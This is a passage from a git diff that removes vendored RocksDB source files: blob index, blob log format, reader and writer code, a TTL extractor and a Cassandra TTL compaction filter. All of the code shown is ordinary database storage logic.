- public:
-  enum class Type : unsigned char {
-    kInlinedTTL = 0,
-    kBlob = 1,
-    kBlobTTL = 2,
-    kUnknown = 3,
-  };
-
-  BlobIndex() : type_(Type::kUnknown) {}
-
-  bool IsInlined() const { return type_ == Type::kInlinedTTL; }
-
-  bool HasTTL() const {
-    return type_ == Type::kInlinedTTL || type_ == Type::kBlobTTL;
-  }
-
-  uint64_t expiration() const {
-    assert(HasTTL());
-    return expiration_;
-  }
-
-  const Slice& value() const {
-    assert(IsInlined());
-    return value_;
-  }
-
-  uint64_t file_number() const {
-    assert(!IsInlined());
-    return file_number_;
-  }
-
-  uint64_t offset() const {
-    assert(!IsInlined());
-    return offset_;
-  }
-
-  uint64_t size() const {
-    assert(!IsInlined());
-    return size_;
-  }
-
-  Status DecodeFrom(Slice slice) {
-    static const std::string kErrorMessage = "Error while decoding blob index";
-    assert(slice.size() > 0);
-    type_ = static_cast<Type>(*slice.data());
-    if (type_ >= Type::kUnknown) {
-      return Status::Corruption(
-          kErrorMessage,
-          "Unknown blob index type: " + ToString(static_cast<char>(type_)));
-    }
-    slice = Slice(slice.data() + 1, slice.size() - 1);
-    if (HasTTL()) {
-      if (!GetVarint64(&slice, &expiration_)) {
-        return Status::Corruption(kErrorMessage, "Corrupted expiration");
-      }
-    }
-    if (IsInlined()) {
-      value_ = slice;
-    } else {
-      if (GetVarint64(&slice, &file_number_) && GetVarint64(&slice, &offset_) &&
-          GetVarint64(&slice, &size_) && slice.size() == 1) {
-        compression_ = static_cast<CompressionType>(*slice.data());
-      } else {
-        return Status::Corruption(kErrorMessage, "Corrupted blob offset");
-      }
-    }
-    return Status::OK();
-  }
-
-  static void EncodeInlinedTTL(std::string* dst, uint64_t expiration,
-                               const Slice& value) {
-    assert(dst != nullptr);
-    dst->clear();
-    dst->reserve(1 + kMaxVarint64Length + value.size());
-    dst->push_back(static_cast<char>(Type::kInlinedTTL));
-    PutVarint64(dst, expiration);
-    dst->append(value.data(), value.size());
-  }
-
-  static void EncodeBlob(std::string* dst, uint64_t file_number,
-                         uint64_t offset, uint64_t size,
-                         CompressionType compression) {
-    assert(dst != nullptr);
-    dst->clear();
-    dst->reserve(kMaxVarint64Length * 3 + 2);
-    dst->push_back(static_cast<char>(Type::kBlob));
-    PutVarint64(dst, file_number);
-    PutVarint64(dst, offset);
-    PutVarint64(dst, size);
-    dst->push_back(static_cast<char>(compression));
-  }
-
-  static void EncodeBlobTTL(std::string* dst, uint64_t expiration,
-                            uint64_t file_number, uint64_t offset,
-                            uint64_t size, CompressionType compression) {
-    assert(dst != nullptr);
-    dst->clear();
-    dst->reserve(kMaxVarint64Length * 4 + 2);
-    dst->push_back(static_cast<char>(Type::kBlobTTL));
-    PutVarint64(dst, expiration);
-    PutVarint64(dst, file_number);
-    PutVarint64(dst, offset);
-    PutVarint64(dst, size);
-    dst->push_back(static_cast<char>(compression));
-  }
-
- private:
-  Type type_ = Type::kUnknown;
-  uint64_t expiration_ = 0;
-  Slice value_;
-  uint64_t file_number_ = 0;
-  uint64_t offset_ = 0;
-  uint64_t size_ = 0;
-  CompressionType compression_ = kNoCompression;
-};
-
-}  // namespace blob_db
-}  // namespace rocksdb
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/blob_db/blob_log_format.cc b/thirdparty/rocksdb/utilities/blob_db/blob_log_format.cc
deleted file mode 100644
index eb748ac..0000000
--- a/thirdparty/rocksdb/utilities/blob_db/blob_log_format.cc
+++ /dev/null
@@ -1,153 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-#ifndef ROCKSDB_LITE
-
-#include "utilities/blob_db/blob_log_format.h"
-
-#include "util/coding.h"
-#include "util/crc32c.h"
-
-namespace rocksdb {
-namespace blob_db {
-
-void BlobLogHeader::EncodeTo(std::string* dst) {
-  assert(dst != nullptr);
-  dst->clear();
-  dst->reserve(BlobLogHeader::kSize);
-  PutFixed32(dst, kMagicNumber);
-  PutFixed32(dst, version);
-  PutFixed32(dst, column_family_id);
-  unsigned char flags = (has_ttl ? 1 : 0);
-  dst->push_back(flags);
-  dst->push_back(compression);
-  PutFixed64(dst, expiration_range.first);
-  PutFixed64(dst, expiration_range.second);
-}
-
-Status BlobLogHeader::DecodeFrom(Slice src) {
-  static const std::string kErrorMessage =
-      "Error while decoding blob log header";
-  if (src.size() != BlobLogHeader::kSize) {
-    return Status::Corruption(kErrorMessage,
-                              "Unexpected blob file header size");
-  }
-  uint32_t magic_number;
-  unsigned char flags;
-  if (!GetFixed32(&src, &magic_number) || !GetFixed32(&src, &version) ||
-      !GetFixed32(&src, &column_family_id)) {
-    return Status::Corruption(
-        kErrorMessage,
-        "Error decoding magic number, version and column family id");
-  }
-  if (magic_number != kMagicNumber) {
-    return Status::Corruption(kErrorMessage, "Magic number mismatch");
-  }
-  if (version != kVersion1) {
-    return Status::Corruption(kErrorMessage, "Unknown header version");
-  }
-  flags = src.data()[0];
-  compression = static_cast<CompressionType>(src.data()[1]);
-  has_ttl = (flags & 1) == 1;
-  src.remove_prefix(2);
-  if (!GetFixed64(&src, &expiration_range.first) ||
-      !GetFixed64(&src, &expiration_range.second)) {
-    return Status::Corruption(kErrorMessage, "Error decoding expiration range");
-  }
-  return Status::OK();
-}
-
-void BlobLogFooter::EncodeTo(std::string* dst) {
-  assert(dst != nullptr);
-  dst->clear();
-  dst->reserve(BlobLogFooter::kSize);
-  PutFixed32(dst, kMagicNumber);
-  PutFixed64(dst, blob_count);
-  PutFixed64(dst, expiration_range.first);
-  PutFixed64(dst, expiration_range.second);
-  PutFixed64(dst, sequence_range.first);
-  PutFixed64(dst, sequence_range.second);
-  crc = crc32c::Value(dst->c_str(), dst->size());
-  crc = crc32c::Mask(crc);
-  PutFixed32(dst, crc);
-}
-
-Status BlobLogFooter::DecodeFrom(Slice src) {
-  static const std::string kErrorMessage =
-      "Error while decoding blob log footer";
-  if (src.size() != BlobLogFooter::kSize) {
-    return Status::Corruption(kErrorMessage,
-                              "Unexpected blob file footer size");
-  }
-  uint32_t src_crc = 0;
-  src_crc = crc32c::Value(src.data(), BlobLogFooter::kSize - 4);
-  src_crc = crc32c::Mask(src_crc);
-  uint32_t magic_number;
-  if (!GetFixed32(&src, &magic_number) || !GetFixed64(&src, &blob_count) ||
-      !GetFixed64(&src, &expiration_range.first) ||
-      !GetFixed64(&src, &expiration_range.second) ||
-      !GetFixed64(&src, &sequence_range.first) ||
-      !GetFixed64(&src, &sequence_range.second) || !GetFixed32(&src, &crc)) {
-    return Status::Corruption(kErrorMessage, "Error decoding content");
-  }
-  if (magic_number != kMagicNumber) {
-    return Status::Corruption(kErrorMessage, "Magic number mismatch");
-  }
-  if (src_crc != crc) {
-    return Status::Corruption(kErrorMessage, "CRC mismatch");
-  }
-  return Status::OK();
-}
-
-void BlobLogRecord::EncodeHeaderTo(std::string* dst) {
-  assert(dst != nullptr);
-  dst->clear();
-  dst->reserve(BlobLogRecord::kHeaderSize + key.size() + value.size());
-  PutFixed64(dst, key.size());
-  PutFixed64(dst, value.size());
-  PutFixed64(dst, expiration);
-  header_crc = crc32c::Value(dst->c_str(), dst->size());
-  header_crc = crc32c::Mask(header_crc);
-  PutFixed32(dst, header_crc);
-  blob_crc = crc32c::Value(key.data(), key.size());
-  blob_crc = crc32c::Extend(blob_crc, value.data(), value.size());
-  blob_crc = crc32c::Mask(blob_crc);
-  PutFixed32(dst, blob_crc);
-}
-
-Status BlobLogRecord::DecodeHeaderFrom(Slice src) {
-  static const std::string kErrorMessage = "Error while decoding blob record";
-  if (src.size() != BlobLogRecord::kHeaderSize) {
-    return Status::Corruption(kErrorMessage,
-                              "Unexpected blob record header size");
-  }
-  uint32_t src_crc = 0;
-  src_crc = crc32c::Value(src.data(), BlobLogRecord::kHeaderSize - 8);
-  src_crc = crc32c::Mask(src_crc);
-  if (!GetFixed64(&src, &key_size) || !GetFixed64(&src, &value_size) ||
-      !GetFixed64(&src, &expiration) || !GetFixed32(&src, &header_crc) ||
-      !GetFixed32(&src, &blob_crc)) {
-    return Status::Corruption(kErrorMessage, "Error decoding content");
-  }
-  if (src_crc != header_crc) {
-    return Status::Corruption(kErrorMessage, "Header CRC mismatch");
-  }
-  return Status::OK();
-}
-
-Status BlobLogRecord::CheckBlobCRC() const {
-  uint32_t expected_crc = 0;
-  expected_crc = crc32c::Value(key.data(), key.size());
-  expected_crc = crc32c::Extend(expected_crc, value.data(), value.size());
-  expected_crc = crc32c::Mask(expected_crc);
-  if (expected_crc != blob_crc) {
-    return Status::Corruption("Blob CRC mismatch");
-  }
-  return Status::OK();
-}
-
-}  // namespace blob_db
-}  // namespace rocksdb
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/blob_db/blob_log_format.h b/thirdparty/rocksdb/utilities/blob_db/blob_log_format.h
deleted file mode 100644
index 0b5cff5..0000000
--- a/thirdparty/rocksdb/utilities/blob_db/blob_log_format.h
+++ /dev/null
@@ -1,123 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Log format information shared by reader and writer.
-
-#pragma once
-
-#ifndef ROCKSDB_LITE
-
-#include <limits>
-#include <utility>
-#include "rocksdb/options.h"
-#include "rocksdb/slice.h"
-#include "rocksdb/status.h"
-#include "rocksdb/types.h"
-
-namespace rocksdb {
-namespace blob_db {
-
-constexpr uint32_t kMagicNumber = 2395959;  // 0x00248f37
-constexpr uint32_t kVersion1 = 1;
-constexpr uint64_t kNoExpiration = std::numeric_limits<uint64_t>::max();
-
-using ExpirationRange = std::pair<uint64_t, uint64_t>;
-using SequenceRange = std::pair<uint64_t, uint64_t>;
-
-// Format of blob log file header (30 bytes):
-//
-//    +--------------+---------+---------+-------+-------------+-------------------+
-//    | magic number | version |  cf id  | flags | compression | expiration range  |
-//    +--------------+---------+---------+-------+-------------+-------------------+
-//    |   Fixed32    | Fixed32 | Fixed32 | char  |    char     | Fixed64   Fixed64 |
-//    +--------------+---------+---------+-------+-------------+-------------------+
-//
-// List of flags:
-//   has_ttl: Whether the file contain TTL data.
-//
-// Expiration range in the header is a rough range based on
-// blob_db_options.ttl_range_secs.
-struct BlobLogHeader {
-  static constexpr size_t kSize = 30;
-
-  uint32_t version = kVersion1;
-  uint32_t column_family_id = 0;
-  CompressionType compression = kNoCompression;
-  bool has_ttl = false;
-  ExpirationRange expiration_range = std::make_pair(0, 0);
-
-  void EncodeTo(std::string* dst);
-
-  Status DecodeFrom(Slice slice);
-};
-
-// Format of blob log file footer (48 bytes):
-//
-//    +--------------+------------+-------------------+-------------------+------------+
-//    | magic number | blob count | expiration range  |  sequence range   | footer CRC |
-//    +--------------+------------+-------------------+-------------------+------------+
-//    |   Fixed32    |  Fixed64   | Fixed64 + Fixed64 | Fixed64 + Fixed64 |   Fixed32  |
-//    +--------------+------------+-------------------+-------------------+------------+
-//
-// The footer will be presented only when the blob file is properly closed.
-//
-// Unlike the same field in file header, expiration range in the footer is the
-// range of smallest and largest expiration of the data in this file.
-struct BlobLogFooter {
-  static constexpr size_t kSize = 48;
-
-  uint64_t blob_count = 0;
-  ExpirationRange expiration_range = std::make_pair(0, 0);
-  SequenceRange sequence_range = std::make_pair(0, 0);
-  uint32_t crc = 0;
-
-  void EncodeTo(std::string* dst);
-
-  Status DecodeFrom(Slice slice);
-};
-
-// Blob record format (32 bytes header + key + value):
-//
-//    +------------+--------------+------------+------------+----------+---------+-----------+
-//    | key length | value length | expiration | header CRC | blob CRC |   key   |   value   |
-//    +------------+--------------+------------+------------+----------+---------+-----------+
-//    |   Fixed64  |   Fixed64    |  Fixed64   |  Fixed32   | Fixed32  | key len | value len |
-//    +------------+--------------+------------+------------+----------+---------+-----------+
-//
-// If file has has_ttl = false, expiration field is always 0, and the blob
-// doesn't has expiration.
-//
-// Also note that if compression is used, value is compressed value and value
-// length is compressed value length.
-//
-// Header CRC is the checksum of (key_len + val_len + expiration), while
-// blob CRC is the checksum of (key + value).
-//
-// We could use variable length encoding (Varint64) to save more space, but it
-// make reader more complicated.
-struct BlobLogRecord {
-  // header include fields up to blob CRC
-  static constexpr size_t kHeaderSize = 32;
-
-  uint64_t key_size = 0;
-  uint64_t value_size = 0;
-  uint64_t expiration = 0;
-  uint32_t header_crc = 0;
-  uint32_t blob_crc = 0;
-  Slice key;
-  Slice value;
-  std::string key_buf;
-  std::string value_buf;
-
-  void EncodeHeaderTo(std::string* dst);
-
-  Status DecodeHeaderFrom(Slice src);
-
-  Status CheckBlobCRC() const;
-};
-
-}  // namespace blob_db
-}  // namespace rocksdb
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/blob_db/blob_log_reader.cc b/thirdparty/rocksdb/utilities/blob_db/blob_log_reader.cc
deleted file mode 100644
index a2421b9..0000000
--- a/thirdparty/rocksdb/utilities/blob_db/blob_log_reader.cc
+++ /dev/null
@@ -1,96 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-#ifndef ROCKSDB_LITE
-
-#include "utilities/blob_db/blob_log_reader.h"
-
-#include <algorithm>
-
-#include "util/file_reader_writer.h"
-
-namespace rocksdb {
-namespace blob_db {
-
-Reader::Reader(std::shared_ptr<Logger> info_log,
-               unique_ptr<SequentialFileReader>&& _file)
-    : info_log_(info_log), file_(std::move(_file)), buffer_(), next_byte_(0) {}
-
-Status Reader::ReadSlice(uint64_t size, Slice* slice, std::string* buf) {
-  buf->reserve(size);
-  Status s = file_->Read(size, slice, &(*buf)[0]);
-  next_byte_ += size;
-  if (!s.ok()) {
-    return s;
-  }
-  if (slice->size() != size) {
-    return Status::Corruption("EOF reached while reading record");
-  }
-  return s;
-}
-
-Status Reader::ReadHeader(BlobLogHeader* header) {
-  assert(file_.get() != nullptr);
-  assert(next_byte_ == 0);
-  Status s = ReadSlice(BlobLogHeader::kSize, &buffer_, &backing_store_);
-  if (!s.ok()) {
-    return s;
-  }
-
-  if (buffer_.size() != BlobLogHeader::kSize) {
-    return Status::Corruption("EOF reached before file header");
-  }
-
-  return header->DecodeFrom(buffer_);
-}
-
-Status Reader::ReadRecord(BlobLogRecord* record, ReadLevel level,
-                          uint64_t* blob_offset) {
-  Status s = ReadSlice(BlobLogRecord::kHeaderSize, &buffer_, &backing_store_);
-  if (!s.ok()) {
-    return s;
-  }
-  if (buffer_.size() != BlobLogRecord::kHeaderSize) {
-    return Status::Corruption("EOF reached before record header");
-  }
-
-  s = record->DecodeHeaderFrom(buffer_);
-  if (!s.ok()) {
-    return s;
-  }
-
-  uint64_t kb_size = record->key_size + record->value_size;
-  if (blob_offset != nullptr) {
-    *blob_offset = next_byte_ + record->key_size;
-  }
-
-  switch (level) {
-    case kReadHeader:
-      file_->Skip(record->key_size + record->value_size);
-      next_byte_ += kb_size;
-      break;
-
-    case kReadHeaderKey:
-      s = ReadSlice(record->key_size, &record->key, &record->key_buf);
-      file_->Skip(record->value_size);
-      next_byte_ += record->value_size;
-      break;
-
-    case kReadHeaderKeyBlob:
-      s = ReadSlice(record->key_size, &record->key, &record->key_buf);
-      if (s.ok()) {
-        s = ReadSlice(record->value_size, &record->value, &record->value_buf);
-      }
-      if (s.ok()) {
-        s = record->CheckBlobCRC();
-      }
-      break;
-  }
-  return s;
-}
-
-}  // namespace blob_db
-}  // namespace rocksdb
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/blob_db/blob_log_reader.h b/thirdparty/rocksdb/utilities/blob_db/blob_log_reader.h
deleted file mode 100644
index 9c76b92..0000000
--- a/thirdparty/rocksdb/utilities/blob_db/blob_log_reader.h
+++ /dev/null
@@ -1,92 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-#pragma once
-
-#ifndef ROCKSDB_LITE
-
-#include <memory>
-#include <string>
-
-#include "rocksdb/slice.h"
-#include "rocksdb/status.h"
-#include "utilities/blob_db/blob_log_format.h"
-
-namespace rocksdb {
-
-class SequentialFileReader;
-class Logger;
-
-namespace blob_db {
-
-/**
- * Reader is a general purpose log stream reader implementation. The actual job
- * of reading from the device is implemented by the SequentialFile interface.
- *
- * Please see Writer for details on the file and record layout.
- */
-class Reader {
- public:
-  enum ReadLevel {
-    kReadHeader,
-    kReadHeaderKey,
-    kReadHeaderKeyBlob,
-  };
-
-  // Create a reader that will return log records from "*file".
-  // "*file" must remain live while this Reader is in use.
-  //
-  // If "reporter" is non-nullptr, it is notified whenever some data is
-  // dropped due to a detected corruption.  "*reporter" must remain
-  // live while this Reader is in use.
-  //
-  // If "checksum" is true, verify checksums if available.
-  //
-  // The Reader will start reading at the first record located at physical
-  // position >= initial_offset within the file.
-  Reader(std::shared_ptr<Logger> info_log,
-         std::unique_ptr<SequentialFileReader>&& file);
-
-  ~Reader() = default;
-
-  // No copying allowed
-  Reader(const Reader&) = delete;
-  Reader& operator=(const Reader&) = delete;
-
-  Status ReadHeader(BlobLogHeader* header);
-
-  // Read the next record into *record.  Returns true if read
-  // successfully, false if we hit end of the input.  May use
-  // "*scratch" as temporary storage.  The contents filled in *record
-  // will only be valid until the next mutating operation on this
-  // reader or the next mutation to *scratch.
-  // If blob_offset is non-null, return offset of the blob through it.
-  Status ReadRecord(BlobLogRecord* record, ReadLevel level = kReadHeader,
-                    uint64_t* blob_offset = nullptr);
-
-  Status ReadSlice(uint64_t size, Slice* slice, std::string* buf);
-
-  SequentialFileReader* file() { return file_.get(); }
-
-  void ResetNextByte() { next_byte_ = 0; }
-
-  uint64_t GetNextByte() const { return next_byte_; }
-
-  const SequentialFileReader* file_reader() const { return file_.get(); }
-
- private:
-  std::shared_ptr<Logger> info_log_;
-  const std::unique_ptr<SequentialFileReader> file_;
-
-  std::string backing_store_;
-  Slice buffer_;
-
-  // which byte to read next. For asserting proper usage
-  uint64_t next_byte_;
-};
-
-}  // namespace blob_db
-}  // namespace rocksdb
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/blob_db/blob_log_writer.cc b/thirdparty/rocksdb/utilities/blob_db/blob_log_writer.cc
deleted file mode 100644
index 806ca3c..0000000
--- a/thirdparty/rocksdb/utilities/blob_db/blob_log_writer.cc
+++ /dev/null
@@ -1,121 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-#ifndef ROCKSDB_LITE
-
-#include "utilities/blob_db/blob_log_writer.h"
-
-#include <cstdint>
-#include <string>
-#include "rocksdb/env.h"
-#include "util/coding.h"
-#include "util/file_reader_writer.h"
-#include "utilities/blob_db/blob_log_format.h"
-
-namespace rocksdb {
-namespace blob_db {
-
-Writer::Writer(unique_ptr<WritableFileWriter>&& dest, uint64_t log_number,
-               uint64_t bpsync, bool use_fs, uint64_t boffset)
-    : dest_(std::move(dest)),
-      log_number_(log_number),
-      block_offset_(boffset),
-      bytes_per_sync_(bpsync),
-      next_sync_offset_(0),
-      use_fsync_(use_fs),
-      last_elem_type_(kEtNone) {}
-
-void Writer::Sync() { dest_->Sync(use_fsync_); }
-
-Status Writer::WriteHeader(BlobLogHeader& header) {
-  assert(block_offset_ == 0);
-  assert(last_elem_type_ == kEtNone);
-  std::string str;
-  header.EncodeTo(&str);
-
-  Status s = dest_->Append(Slice(str));
-  if (s.ok()) {
-    block_offset_ += str.size();
-    s = dest_->Flush();
-  }
-  last_elem_type_ = kEtFileHdr;
-  return s;
-}
-
-Status Writer::AppendFooter(BlobLogFooter& footer) {
-  assert(block_offset_ != 0);
-  assert(last_elem_type_ == kEtFileHdr || last_elem_type_ == kEtRecord);
-
-  std::string str;
-  footer.EncodeTo(&str);
-
-  Status s = dest_->Append(Slice(str));
-  if (s.ok()) {
-    block_offset_ += str.size();
-    s = dest_->Close();
-    dest_.reset();
-  }
-
-  last_elem_type_ = kEtFileFooter;
-  return s;
-}
-
-Status Writer::AddRecord(const Slice& key, const Slice& val,
-                         uint64_t expiration, uint64_t* key_offset,
-                         uint64_t* blob_offset) {
-  assert(block_offset_ != 0);
-  assert(last_elem_type_ == kEtFileHdr || last_elem_type_ == kEtRecord);
-
-  std::string buf;
-  ConstructBlobHeader(&buf, key, val, expiration);
-
-  Status s = EmitPhysicalRecord(buf, key, val, key_offset, blob_offset);
-  return s;
-}
-
-Status Writer::AddRecord(const Slice& key, const Slice& val,
-                         uint64_t* key_offset, uint64_t* blob_offset) {
-  assert(block_offset_ != 0);
-  assert(last_elem_type_ == kEtFileHdr || last_elem_type_ == kEtRecord);
-
-  std::string buf;
-  ConstructBlobHeader(&buf, key, val, 0);
-
-  Status s = EmitPhysicalRecord(buf, key, val, key_offset, blob_offset);
-  return s;
-}
-
-void Writer::ConstructBlobHeader(std::string* buf, const Slice& key,
-                                 const Slice& val, uint64_t expiration) {
-  BlobLogRecord record;
-  record.key = key;
-  record.value = val;
-  record.expiration = expiration;
-  record.EncodeHeaderTo(buf);
-}
-
-Status Writer::EmitPhysicalRecord(const std::string& headerbuf,
-                                  const Slice& key, const Slice& val,
-                                  uint64_t* key_offset, uint64_t* blob_offset) {
-  Status s = dest_->Append(Slice(headerbuf));
-  if (s.ok()) {
-    s = dest_->Append(key);
-  }
-  if (s.ok()) {
-    s = dest_->Append(val);
-  }
-  if (s.ok()) {
-    s = dest_->Flush();
-  }
-
-  *key_offset = block_offset_ + BlobLogRecord::kHeaderSize;
-  *blob_offset = *key_offset + key.size();
-  block_offset_ = *blob_offset + val.size();
-  last_elem_type_ = kEtRecord;
-  return s;
-}
-
-}  // namespace blob_db
-}  // namespace rocksdb
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/blob_db/blob_log_writer.h b/thirdparty/rocksdb/utilities/blob_db/blob_log_writer.h
deleted file mode 100644
index 2a1f05e..0000000
--- a/thirdparty/rocksdb/utilities/blob_db/blob_log_writer.h
+++ /dev/null
@@ -1,91 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-#pragma once
-
-#ifndef ROCKSDB_LITE
-
-#include <cstdint>
-#include <memory>
-#include <string>
-
-#include "rocksdb/slice.h"
-#include "rocksdb/status.h"
-#include "rocksdb/types.h"
-#include "utilities/blob_db/blob_log_format.h"
-
-namespace rocksdb {
-
-class WritableFileWriter;
-
-namespace blob_db {
-
-/**
- * Writer is the blob log stream writer. It provides an append-only
- * abstraction for writing blob data.
- *
- *
- * Look at blob_db_format.h to see the details of the record formats.
- */
-
-class Writer {
- public:
-  // Create a writer that will append data to "*dest".
-  // "*dest" must be initially empty.
-  // "*dest" must remain live while this Writer is in use.
-  explicit Writer(std::unique_ptr<WritableFileWriter>&& dest,
-                  uint64_t log_number, uint64_t bpsync, bool use_fsync,
-                  uint64_t boffset = 0);
-
-  ~Writer() = default;
-
-  // No copying allowed
-  Writer(const Writer&) = delete;
-  Writer& operator=(const Writer&) = delete;
-
-  static void ConstructBlobHeader(std::string* buf, const Slice& key,
-                                  const Slice& val, uint64_t expiration);
-
-  Status AddRecord(const Slice& key, const Slice& val, uint64_t* key_offset,
-                   uint64_t* blob_offset);
-
-  Status AddRecord(const Slice& key, const Slice& val, uint64_t expiration,
-                   uint64_t* key_offset, uint64_t* blob_offset);
-
-  Status EmitPhysicalRecord(const std::string& headerbuf, const Slice& key,
-                            const Slice& val, uint64_t* key_offset,
-                            uint64_t* blob_offset);
-
-  Status AppendFooter(BlobLogFooter& footer);
-
-  Status WriteHeader(BlobLogHeader& header);
-
-  WritableFileWriter* file() { return dest_.get(); }
-
-  const WritableFileWriter* file() const { return dest_.get(); }
-
-  uint64_t get_log_number() const { return log_number_; }
-
-  bool ShouldSync() const { return block_offset_ > next_sync_offset_; }
-
-  void Sync();
-
-  void ResetSyncPointer() { next_sync_offset_ += bytes_per_sync_; }
-
- private:
-  std::unique_ptr<WritableFileWriter> dest_;
-  uint64_t log_number_;
-  uint64_t block_offset_;  // Current offset in block
-  uint64_t bytes_per_sync_;
-  uint64_t next_sync_offset_;
-  bool use_fsync_;
-
- public:
-  enum ElemType { kEtNone, kEtFileHdr, kEtRecord, kEtFileFooter };
-  ElemType last_elem_type_;
-};
-
-}  // namespace blob_db
-}  // namespace rocksdb
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/blob_db/ttl_extractor.cc b/thirdparty/rocksdb/utilities/blob_db/ttl_extractor.cc
deleted file mode 100644
index 267f904..0000000
--- a/thirdparty/rocksdb/utilities/blob_db/ttl_extractor.cc
+++ /dev/null
@@ -1,34 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-#ifndef ROCKSDB_LITE
-
-#include "utilities/blob_db/blob_db.h"
-#include "util/coding.h"
-
-namespace rocksdb {
-namespace blob_db {
-
-bool TTLExtractor::ExtractTTL(const Slice& /*key*/, const Slice& /*value*/,
-                              uint64_t* /*ttl*/, std::string* /*new_value*/,
-                              bool* /*value_changed*/) {
-  return false;
-}
-
-bool TTLExtractor::ExtractExpiration(const Slice& key, const Slice& value,
-                                     uint64_t now, uint64_t* expiration,
-                                     std::string* new_value,
-                                     bool* value_changed) {
-  uint64_t ttl;
-  bool has_ttl = ExtractTTL(key, value, &ttl, new_value, value_changed);
-  if (has_ttl) {
-    *expiration = now + ttl;
-  }
-  return has_ttl;
-}
-
-}  // namespace blob_db
-}  // namespace rocksdb
-
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/cassandra/cassandra_compaction_filter.cc b/thirdparty/rocksdb/utilities/cassandra/cassandra_compaction_filter.cc
deleted file mode 100644
index e817972..0000000
--- a/thirdparty/rocksdb/utilities/cassandra/cassandra_compaction_filter.cc
+++ /dev/null
@@ -1,47 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include "utilities/cassandra/cassandra_compaction_filter.h"
-#include <string>
-#include "rocksdb/slice.h"
-#include "utilities/cassandra/format.h"
-
-
-namespace rocksdb {
-namespace cassandra {
-
-const char* CassandraCompactionFilter::Name() const {
-  return "CassandraCompactionFilter";
-}
-
-CompactionFilter::Decision CassandraCompactionFilter::FilterV2(
-  int level,
-  const Slice& key,
-  ValueType value_type,
-  const Slice& existing_value,
-  std::string* new_value,
-  std::string* skip_until) const {
-
-  bool value_changed = false;
-  RowValue row_value = RowValue::Deserialize(
-    existing_value.data(), existing_value.size());
-  RowValue compacted = purge_ttl_on_expiration_ ?
-    row_value.PurgeTtl(&value_changed) :
-    row_value.ExpireTtl(&value_changed);
-
-  if(compacted.Empty()) {
-    return Decision::kRemove;
-  }
-
-  if (value_changed) {
-    compacted.Serialize(new_value);
-    return Decision::kChangeValue;
-  }
-
-  return Decision::kKeep;
-}
-
-}  // namespace cassandra
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/utilities/cassandra/cassandra_compaction_filter.h b/thirdparty/rocksdb/utilities/cassandra/cassandra_compaction_filter.h
deleted file mode 100644
index c09b8e7..0000000
--- a/thirdparty/rocksdb/utilities/cassandra/cassandra_compaction_filter.h
+++ /dev/null
@@ -1,39 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-#include <string>
-#include "rocksdb/compaction_filter.h"
-#include "rocksdb/slice.h"
-
-namespace rocksdb {
-namespace cassandra {
-
-/**
- * Compaction filter for removing expired Cassandra data with ttl.
- * If option `purge_ttl_on_expiration` is set to true, expired data
- * will be directly purged. Otherwise expired data will be converted
- * tombstones first, then be eventally removed after gc grace period. 
- * `purge_ttl_on_expiration` should only be on in the case all the 
- * writes have same ttl setting, otherwise it could bring old data back.
- */
-class CassandraCompactionFilter : public CompactionFilter {
-public:
-  explicit CassandraCompactionFilter(bool purge_ttl_on_expiration)
-    : purge_ttl_on_expiration_(purge_ttl_on_expiration) {}
-
-  const char* Name() const override;
-  virtual Decision FilterV2(int level,
-                            const Slice& key,
-                            ValueType value_type,
-                            const Slice& existing_value,
-                            std::string* new_value,
-                            std::string* skip_until) const override;
-
-private:
-  bool purge_ttl_on_expiration_;
-};
-}  // namespace cassandra
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/utilities/cassandra/cassandra_format_test.cc b/thirdparty/rocksdb/utilities/cassandra/cassandra_format_test.cc
deleted file mode 100644
index 0cf124d..0000000
--- a/thirdparty/rocksdb/utilities/cassandra/cassandra_format_test.cc
+++ /dev/null
@@ -1,353 +0,0 @@
-// Copyright (c) 2017-present, Facebook, Inc.  All rights reserved.
